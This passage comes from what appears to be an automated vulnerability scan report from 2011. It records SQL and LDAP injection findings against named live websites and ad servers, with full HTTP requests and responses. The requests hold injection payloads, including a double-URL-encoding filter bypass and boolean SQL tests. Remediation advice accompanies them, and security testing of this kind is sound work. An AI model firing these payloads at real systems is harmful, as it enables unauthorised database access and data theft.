Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:42:14 GMT
Expires: Mon, 14 Feb 2011 01:42:15 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDASTCAQQC=LDMLGBKDPDJFNIBBNADNPNMD; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772%27, @campaignId = 6468, @syndicationOutletId = 49160, @adro
...[SNIP]...
1.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the campaignId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468%2527&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:42 GMT
Expires: Mon, 14 Feb 2011 01:41:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQQTQBCC=DLBNDMJDNKIDNMDKPADJABFN; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468%27, @syndicationOutletId = 49160, @adro
...[SNIP]...
1.7. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the siteId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55%2527&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:06 GMT
Expires: Mon, 14 Feb 2011 01:41:06 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSACDSAD=PMPJANJDAHGLDPAGNOMFKNLG; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55%27, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adro
...[SNIP]...
1.8. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the syndicationOutletId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160%2527&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:27 GMT
Expires: Mon, 14 Feb 2011 01:41:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSACDSSTA=AHLNOCKDFBNKACKODKPLOBNG; path=/
X-Powered-By: ASP.NET
Content-Length: 1402
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160%27, @adro
...[SNIP]...
1.9. http://www.desmoinesregister.com/scripts/app/js/jquery-1.3.1.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.desmoinesregister.com
Path:   /scripts/app/js/jquery-1.3.1.min.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/app'%20and%201%3d1--%20/js/jquery-1.3.1.min.js?ver=3.0.4 HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 14:52:28 GMT
X-Processing-begin: MOC-WN0508, on site D2 (2011-02-14 09:52:28:366)
Content-Type: text/html
X-Processing-finished: MOC-WN0508, on site D2 (2011-02-14 09:52:28:412)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27910
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 14:52:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<!-- Delivery of Cache Page
Time used: 46 ms<br>
<b>Starting first parse</b><br>
.Build 9: 15 ms (Content)<br>
Retrieve categories: 0ms<br>
Read templates: 0ms<br>
Read objects: 0ms<br>
Scripts: 15ms<br>

-->

Request 2

GET /scripts/app'%20and%201%3d2--%20/js/jquery-1.3.1.min.js?ver=3.0.4 HTTP/1.1
Host: www.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Mon, 14 Feb 2011 14:52:28 GMT
X-Processing-begin: MOC-WN0509, on site D2 (2011-02-14 09:52:28:514)
Content-Type: text/html
X-Processing-finished: MOC-WN0509, on site D2 (2011-02-14 09:52:28:608)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 27923
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 14:52:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
                               <title> | The Des Moines Register | DesMoinesRegister.com
...[SNIP]...
<!-- Delivery of Cache Page
Time used: 78 ms Wait: 156 ms<br>
<b>Starting first parse</b><br>
.Build 9: 63 ms (Content)<br>
Retrieve categories: 0ms<br>
Read templates: 0ms<br>
Read objects: 0ms<br>
Scripts: 63ms<br>

-->
1.10. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.webbyawards.com
Path:   /webbys/current_honorees.php

Issue detail

The media_id parameter appears to be vulnerable to SQL injection attacks. The payloads 11757037%20or%201%3d1--%20 and 11757037%20or%201%3d2--%20 were each submitted in the media_id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webbys/current_honorees.php?media_id=9611757037%20or%201%3d1--%20&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:47:43 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=7b324e13987363266d824018404c2afd; expires=Mon, 21-Feb-2011 14:47:43 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /webbys/current_honorees.php?media_id=9611757037%20or%201%3d2--%20&category_id=61&season=13 HTTP/1.1
Host: www.webbyawards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:48:18 GMT
Server: Apache
X-Powered-By: PHP/4.3.10
Set-Cookie: PHPSESSID=dafa34d404b3719f86b4df44da0b03b1; expires=Mon, 21-Feb-2011 14:48:18 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20652




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Webby Honorees</title>

<link href="/css/screen.css" rel="stylesheet" type="text/css" media="screen" />
<!--[if lte IE 7]>
<link href="/css/screen-ie.css" rel="stylesheet" type="text/css" media="screen" />
<![endif]-->

<!--[if lte IE 6]>
<link href="/css/screen-ie6.css" rel="stylesheet" type="text/css" media="screen" />
<![endif]-->



<link rel="shortcut icon" href="/images/favicon.ico" >



<script language="javascript" type="text/javascript" src="/script/rotate_quote.js"></script>
<script language="javascript" type="text/javascript" src="/script/site_globals.js"></script>
<script language="javascript" type="text/javascript" src="/script/swfobject.js"></script>


<style type="text/css">
        #bottom{ display: block; height: 300px; width: 400px; z-index: 10000; }
       </style>
       <script type="text/javascript" src="/takeover/js/swfobject.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
       
       <!--for homepage carousel -->
       <script type="text/javascript" src="/index-slider/js/jquery.jcarousel.js"></script>
<script type="text/javascript" src="/index-slider/js/jquery.cycle.all.js"></script>
       <link rel="stylesheet" type="text/css" href="/index-slider/css/skin.css" />
       
       

    <script type="text/javascript">
    var flashvars = {
       };
       var params = {
       };
       var attributes = {
        wmode: "transparent"
       };
    swfobject.embedSWF("/takeover/media/webbys.swf", "myContent", "400", "300", "9.0.0", flashvars, params, attributes);
    $(document).ready(function(){
    $("#close-flash").hide();
    $("#close-flash").de
...[SNIP]...
2. LDAP injection  previous
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

2.1. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The q parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1e4b745d4d07d9a8)(sn=* and 1e4b745d4d07d9a8)!(sn=* were each submitted in the q parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=1e4b745d4d07d9a8)(sn=*&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 1

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Tue, 15 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Tue, 15 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=90
Expires: Mon, 14 Feb 2011 14:51:20 GMT
Date: Mon, 14 Feb 2011 14:49:50 GMT
Connection: close
Content-Length: 4237

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='1e4b745d4
...[SNIP]...
<iframe src="http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=27;s=3;d=9;w=300;h=250;l=http://xads.zedo.com/ads2/c%3Fa=805982%3Bn=305%3Bx=2333%3Bc=305002942,305002942%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=916%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250></iframe>');

var zzChId = -1;
var zzPbId = -1;
zzChId='2942';zzPbId='916';
var zzAdTagId = '805982_'+zzChId+'_'+zzPbId+'_300_250';
document.write("<span id='Zedo-Ad="+zzAdTagId+";Domain=.zedo.com'>");
document.write("</span>")
document.write('<script type="text/JavaScript">_qoptions={qacct:"p-02uqnnIGWyZdo"};<\/script><script type="text/JavaScript" src="http://secure.quantserve.com/quant.js"><\/script><noscript><img src=http://secure.quantserve.com/pixel/p-02uqnnIGWyZdo.gif style="display:none;" border="0" height="1" width="1" alt="Quantcast"/></noscript>');










   




Request 2

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=1e4b745d4d07d9a8)!(sn=*&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Tue, 15 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Tue, 15 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=90
Expires: Mon, 14 Feb 2011 14:51:21 GMT
Date: Mon, 14 Feb 2011 14:49:51 GMT
Connection: close
Content-Length: 5579

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='1e4b745d4
...[SNIP]...
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="300" height="250" id="300x250_7060dg_krons_debtw_vtg" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain" />');
